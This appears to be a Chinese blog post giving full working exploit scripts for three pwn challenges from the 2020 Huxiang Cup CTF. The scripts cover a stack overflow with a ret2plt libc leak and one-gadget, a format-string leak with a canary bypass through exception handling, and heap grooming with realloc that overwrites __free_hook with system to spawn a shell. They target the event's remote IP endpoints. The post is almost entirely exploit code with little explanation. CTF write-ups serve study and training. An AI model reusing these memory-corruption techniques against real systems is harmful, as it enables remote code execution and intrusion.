2020-11-5 00:13

2020 湖湘杯 pwn题解

pwn_printf

简单的 stack 溢出

#https://github.com/matrix1001/welpwn
from PwnContext import *
 
try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')
 
if __name__ == '__main__':       
    # pwn_printf solve script on the welpwn PwnContext template (link above).
    # Every address and offset below is specific to the challenge binary and
    # the libc it was served with; none of it is portable to another build.
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'
    # functions for quick script
    # Thin wrappers around the ctx I/O helpers; str() so an int can be passed.
    s       = lambda data               :ctx.send(str(data))        #in case that data is an int
    sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))
    sl      = lambda data               :ctx.sendline(str(data))
    sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))
    r       = lambda numb=4096          :ctx.recv(numb)
    ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
    irt     = lambda                    :ctx.interactive()
    rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
    dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
    # misc functions
    # Unpack a short (possibly truncated) leak as a little-endian int by
    # zero-padding it to 4 / 8 bytes first.
    uu32    = lambda data   :u32(data.ljust(4, '\0'))
    uu64    = lambda data   :u64(data.ljust(8, '\0'))
 
    # Target selection: the local binary, plus the service endpoint used
    # during the event.
    ctx.binary = './pwn'
    #ctx.custom_lib_dir = '/home/iddm/glibc-all-in-one/libs/2.27-3ubuntu1_amd64'
    ctx.remote = ('47.111.104.99', 52206)
    #ctx.remote_libc = './libc.so'
    #ctx.debug_remote_libc = True
 
    # Symbol and breakpoint hints handed to the debugger by ctx.debug();
    # presumably addresses in the challenge binary -- confirm against it.
    ctx.symbols = {
        'dest':0x4000000,
    }
 
    ctx.breakpoints = [0x0401009, 0x40103F,0x040112E,0x4007D4]#menu
 
    def lg(s,addr):
        # Print a labelled address in bold red (ANSI escape) so it stands out
        # in the debug log; s is the label, addr is printed as hex.
        print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
 
    #def add(size):
 
    #def delete(idx):
 
    #def show(idx):
 
    #def edit():
 
 
    #rs()
    # Start against the remote service (swap for rs() to run the local binary).
    rs('remote')
    # dbg() is still called on the remote run; presumably ctx.debug() is a
    # no-op without a local process -- confirm in welpwn before relying on it.
    dbg()
    ru('resting\n')
    # Sixteen inputs of '32' are fed to the program before the overflowing
    # write; what the program does with them is not visible in this script.
    for i in range(16):
        sl('32')
 
    # Stage 1: a ret2plt chain. The fixed 0x40xxxx / 0x60xxxx addresses imply
    # a non-PIE binary with a writable GOT (PIE plus full RELRO would remove
    # exactly the fixed targets this chain depends on). Layout: one zero
    # qword, then pop rdi; puts@got; puts@plt; ret -- i.e. puts(&puts@got),
    # which prints the runtime address of puts.
    pop_rdi = 0x0401213
    puts_plt = 0x400640
    puts_got = 0x603018
    ret = 0x40117F
    payload = p64(0)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(ret)
    s(payload)
    # Read up to the 0x7f high byte of the leaked pointer, keep the last 6
    # bytes, and subtract the hard-coded offset of puts in the target libc
    # to obtain the libc base.
    libc = uu64(ru('\x7f',drop=False)[-6:])-0x6f6a0
 
    lg('libc',libc)
    # Hard-coded libc offset named 'one'; presumably a one-shot gadget for the
    # target libc build -- only meaningful for that exact build.
    one = libc + 0x4527a
 
    # Stage 2: 8 NUL bytes followed by the low 6 bytes of the target address
    # (a canonical x86-64 user-space address fits in 6 bytes).
    payload = '\0'*8 + p64(one)[:6]
    s(payload)
    # Hand the session over to the operator.
    irt()

blend_pwn

利用异常捕获机制绕过 canary 判断，控制 rbp 达成利用

#https://github.com/matrix1001/welpwn
from PwnContext import *
 
try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')
 
if __name__ == '__main__':       
    # blend_pwn solve script on the welpwn PwnContext template (link above).
    # All offsets are for the challenge binary / libc build only.
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'
    # functions for quick script
    # Thin wrappers around the ctx I/O helpers; str() so an int can be passed.
    s       = lambda data               :ctx.send(str(data))        #in case that data is an int
    sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))
    sl      = lambda data               :ctx.sendline(str(data))
    sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))
    r       = lambda numb=4096          :ctx.recv(numb)
    ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
    irt     = lambda                    :ctx.interactive()
    rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
    dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
    # misc functions
    # Unpack a short (possibly truncated) leak as a little-endian int by
    # zero-padding it to 4 / 8 bytes first.
    uu32    = lambda data   :u32(data.ljust(4, '\0'))
    uu64    = lambda data   :u64(data.ljust(8, '\0'))
 
    # Target selection: the local binary, plus the service endpoint used
    # during the event.
    ctx.binary = './pwn'
    ctx.remote = ('47.111.96.55', 53404)
 
    # Symbol / breakpoint hints for ctx.debug(); the small values look like
    # offsets into a PIE binary -- confirm against the challenge binary.
    ctx.symbols = {
        'node':0x202090,
    }
 
    ctx.breakpoints = [0x117C,0x11B8,0x12C2]#menu
 
    def lg(s,addr):
        # Print a labelled address in bold red (ANSI escape) so it stands out
        # in the debug log; s is the label, addr is printed as hex.
        print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
 
    # Menu wrappers. The integers are the program's menu choices; the prompt
    # fragments ('>', 'note:\n', 'index>') are waited for before each send.
    def add(content='\n'):
        # Menu 2: create a note holding `content` (sent raw, no newline added,
        # so callers append their own '\n').
        sla('>',2)
        sa('note:\n',content)
 
    def delete(idx):
        # Menu 3: delete the note at index idx.
        sla('>',3)
        sla('index>',idx)
 
    def show_name():
        # Menu 1: print the current user name.
        sla('>',1)
 
    def show():
        # Menu 4: presumably lists the notes; the script reads the '2:' entry
        # from its output below.
        sla('>',4)
 
    #def show(idx):
 
    #def edit():
 
 
    #rs()
    rs('remote')
 
    #dbg()
    # Step 1: format-string leak. The user name is evidently passed to a
    # printf-style function, so "%3$p" makes it print the third vararg as a
    # pointer; the 14 characters read ('0x' + 12 hex digits) are parsed as an
    # int. Passing user input as the format string is the root cause here.
    name = "%3$p"
    sla('name: ',name)
    show_name()
    ru('Current user:')
    libc = int(r(14),16)
    lg('libc',libc)
    # libc base = leaked pointer minus its hard-coded offset. malloc_hook is
    # computed but never used below.
    base = libc - 0xf7380
    malloc_hook = base + 0x3c4aed
    # Step 2: two notes filled with one repeated libc address (hard-coded
    # offset, 10 x 8 = 80 bytes), then both freed.
    payload = p64(base+0x45226)*10
    add(payload+'\n')
    add(payload+'\n')
    delete(0)
    delete(1)
    dbg()
    show()
    # After the frees, the first 6 bytes printed for entry '2:' are read as a
    # heap pointer (presumably a freed chunk's forward link -- confirm in gdb).
    ru('2:')
    heap = uu64(r(6))
    aim = heap + 0x10
    lg('aim',aim)
    #add()
    #delete(0)
    #delete(1)
    #delete(0)
 
    # Step 3: hidden menu choice 666. Per the writeup, the program's exception
    # handling path lets the saved rbp be replaced without tripping the stack
    # canary check: 0x20 bytes of filler, then the low 6 bytes of aim+0x20.
    sla('>',666)
    payload = '0'*0x20+p64(aim+0x20)[:6]+'\n'
    sa('want',payload)
 
    # Hand the session over to the operator.
    irt()

only_add

realloc 利用，注意堆布局

#https://github.com/matrix1001/welpwn
from PwnContext import *
 
try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')
import time
 
if __name__ == '__main__':       
    # only_add solve script on the welpwn PwnContext template (link above).
    # The whole exploit runs inside a retry loop because one step guesses
    # part of an address; see the comments on the loop below. All sizes and
    # offsets are hand-tuned for this binary and the glibc 2.27 build named
    # in ctx.custom_lib_dir.
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'
    # functions for quick script
    # Thin wrappers around the ctx I/O helpers; str() so an int can be passed.
    s       = lambda data               :ctx.send(str(data))        #in case that data is an int
    sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))
    sl      = lambda data               :ctx.sendline(str(data))
    sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))
    r       = lambda numb=4096          :ctx.recv(numb)
    ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
    irt     = lambda                    :ctx.interactive()
    rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
    dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
    # misc functions
    # Unpack a short (possibly truncated) leak as a little-endian int by
    # zero-padding it to 4 / 8 bytes first.
    uu32    = lambda data   :u32(data.ljust(4, '\0'))
    uu64    = lambda data   :u64(data.ljust(8, '\0'))
 
    # Run the local binary against a specific glibc 2.27 build so the
    # hard-coded offsets below line up; the remote endpoint is commented out.
    ctx.binary = './pwn'
    ctx.custom_lib_dir = '/home/iddm/glibc-all-in-one/libs/2.27-3ubuntu1_amd64'
    #ctx.custom_lib_dir = '/glibc/2.27/amd64/lib'
    #ctx.remote = ('172.16.9.21', 9006)
    #ctx.remote_libc = './libc.so'
    ctx.debug_remote_libc = True
 
    # Symbol / breakpoint hints for ctx.debug(); the small values look like
    # offsets into a PIE binary -- confirm against the challenge binary.
    ctx.symbols = {
        'node':0x202040,
        'mark':0x202010
    }
 
    ctx.breakpoints = [0xB11]#menu
 
    def lg(s,addr):
        # Print a labelled address in bold red (ANSI escape) so it stands out
        # in the log; s is the label, addr is printed as hex.
        print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
 
    def add(size,content='\n',mark=0):
        # Menu 1: request `size` bytes and, unless size is 0, send `content`
        # as the data (raw, no newline added). mark=0 synchronises on the
        # program's prompts; mark=1 pauses 0.1s between sends instead of
        # waiting for the first two prompts. mark=1 is not used in this script.
        if mark == 0:
            sla('ice:',1)
            sla('ize',size)
            if size == 0:
                return
            sa('ta:',content)
        elif mark == 1:
            time.sleep(0.1)
            sl(1)
            time.sleep(0.1)
            sl(size)
            if size == 0:
                return
            time.sleep(0.1)
            sa('ta:',content)
 
    def add_1(size,content='\n'):
        # Variant of add() used after clear(): paced with sleeps only, and the
        # data is sent with s() rather than waiting for the 'ta:' prompt.
        sl(1)
        time.sleep(0.1)
        sl(size)
        time.sleep(0.1)
        if size == 0:
            return
        s(content)
        time.sleep(0.1)
 
    def clear():
        # Menu 2: the program's clear action; waits for its 'ye' reply.
        sla('ice',2)
        ru('ye')
 
    # Retry loop. The '\x1d\x77' write below is a 2-byte partial pointer
    # overwrite whose upper bits are guessed, so most runs fail; on EOFError
    # the target is simply restarted. KeyboardInterrupt is swallowed as well
    # (the 'break' is commented out), so Ctrl-C outside the interactive
    # session does not stop the loop -- stop the process externally.
    while True:
        try:
            # Quieter logging for the repeated attempts.
            context.log_level = 'info'
            rs()
            #rs('remote')
 
            # fill the tcache
            # Seven allocations of each size (tcache keeps at most 7 chunks
            # per size class).
            for i in range(7):
                add(0xa0)
                add(0x10)
            #dbg()
            # Heap layout. The sizes are hand-tuned for this binary and the
            # order of every add() below matters; add(0) returns at the size
            # prompt without sending any data.
            add(0x200)
            add(0x200-0x20)
            add(0x200-0x20-0x90) #get the unsorted bin
            add(0x200-0x20-0x90-0x30)
            add(0x200-0x20-0x90-0x30-0x40)
            add(0)
            #dbg()
            # Contents ending in chr(0x81) / p64(0xc1) / chr(0x61) / chr(0x90)
            # rewrite a neighbouring chunk's size field; '\x1d\x77' is the
            # guessed 2-byte partial pointer overwrite mentioned above.
            add(0x38,p64(0)*7+chr(0x81))
            add(0)
            add(0x20)
            add(0)
            add(0x70,p64(0)*5+p64(0xc1)+'\x1d\x77')
            add(0)
            #dbg()
            #dbg()
            add(0xe8,p64(0)*29+chr(0x81))
            add(0)
            add(0x30)
            add(0)
            add(0xe0)
            #dbg()
            add(0xe0-0x38,p64(0)*21+chr(0x61))
            add(0)
            add(0x30)
            add(0)
            add(0x50,p64(0)*7+p64(0x71)+chr(0x90))
            add(0)
            add(0x70)
            add(0)
            add(0x70)
            add(0)
            #dbg()
            # 0xfbad3887 is the classic _IO_FILE flags value for a stdout
            # leak: presumably this write lands in stdout's FILE struct so the
            # next output spills a libc pointer -- confirm in gdb.
            add(0x70,'\0'*0x43+p64(0xfbad3887)+p64(0)*3+chr(0x70))
            # libc base from the 6 leaked bytes minus offsets hard-coded for
            # the 2.27 build selected above; free_hook and system likewise.
            libc_base = uu64(ru('\x7f',drop=False)[-6:]) - 0x3b07e3 + 0x73
            free_hook = libc_base + 0x3b18e8
            system = libc_base + 0x13440
            lg('libc_base',libc_base)
            clear()
            # Final stage: free_hook-0x18 is planted as a pointer; the later
            # 0x60 write then places 0x18 bytes of command string followed by
            # system's address, i.e. __free_hook <- system and the chunk's
            # first bytes become its argument. The '1>&2' presumably because
            # stdout was disturbed by the FILE write above.
            add_1(0x50,p64(0)*7+p64(0xd1)+p64(free_hook-0x18))
            add_1(0)
            add_1(0x60)
            add_1(0)
            #dbg()
            payload = 'exec /bin/sh 1>&2\0'
            payload = payload.ljust(0x18,'\0')
            add_1(0x60,payload+p64(system))
            #dbg()
            add_1(0)
            #dbg()
            # Hand the session over to the operator.
            irt()
        except KeyboardInterrupt:
            #break
            pass
        except EOFError:
            #continue
            pass

当做记录，本来想放到专栏去的，但是专栏排版好像有些问题，就放到这里来凑数。


